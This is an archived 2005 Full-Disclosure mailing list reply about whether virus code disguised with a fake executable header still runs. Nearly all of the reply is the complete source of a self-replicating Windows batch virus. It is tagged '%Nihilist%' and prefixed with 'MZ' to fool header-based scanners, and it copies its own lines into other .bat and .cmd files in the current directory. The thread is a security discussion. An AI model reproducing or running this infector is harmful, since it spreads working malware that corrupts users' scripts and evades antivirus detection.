lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Fri Oct 28 14:25:46 2005
From: auto445789 at hushmail.com (auto445789@...hmail.com)
Subject: RE: Full-Disclosure Digest, Vol 8, Issue 48

> The virus scanner determined the type of the file by
> the header and it failed. That's bad news. I am
> wondering however, when I execute that file, how does
> the OS process the file? I guess my question is, if I
> have a modified version of a virus, with whatever
> header, if I try to execute that file, will the virus
> code get executed?

Lets see, do you think this would be executed?
-------------------------------------------------------
MZ%Nihilist%
%Nihilist%@...o off
%Nihilist%set num=0
:ag	%Nihilist%
%Nihilist%set fn%num%=
%Nihilist%set /a num+=1
%Nihilist%if %num% LSS 5 goto ag
%Nihilist%set num=0
%Nihilist%for %%a in (*.bat *.cmd) do call :mr %%a
%Nihilist%set num=-1
:fi	%Nihilist%
%Nihilist%set /a num+=1
%Nihilist%if %num% GTR 5 (goto ROF)
%Nihilist%if %num% EQU 0 (set file=%fn0%)
%Nihilist%if %num% EQU 1 (set file=%fn1%)
%Nihilist%if %num% EQU 2 (set file=%fn2%)
%Nihilist%if %num% EQU 3 (set file=%fn3%)
%Nihilist%if %num% EQU 4 (set file=%fn4%)
%Nihilist%if %num% EQU 5 (set file=%fn5%)
%Nihilist%set rnd=%random%
%Nihilist%set spth=%0
:findnum	%Nihilist%
%Nihilist%set /a rnd-=10
%Nihilist%if %rnd% GEQ 10 (goto findnum)
%Nihilist%set lz=0
%Nihilist%del tmp
%Nihilist%for /f "tokens=1*" %%a in (%file%) do if 1 EQU 1 (
%Nihilist%  set lc=%%a %%b
%Nihilist%  call :wl
%Nihilist%)
find "Nihilist" <%spth% >>tmp
%Nihilist%more +%rnd% < %file% >>tmp
%Nihilist%move /y tmp %file%
%Nihilist%@...o on
%Nihilist%goto fi
:wl	%Nihilist%
%Nihilist%set /a lz=%lz%+1
%Nihilist%if %lz% LEQ %rnd% (echo %lc% >>tmp)
%Nihilist%goto :EOF
:mr	%Nihilist%
%Nihilist%if %num% LEQ 5 (
%Nihilist%set fn%num%=%1
%Nihilist%set /a num+=1
%Nihilist%)
:ROF	%Nihilist%
-------------------------------------------------------




Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ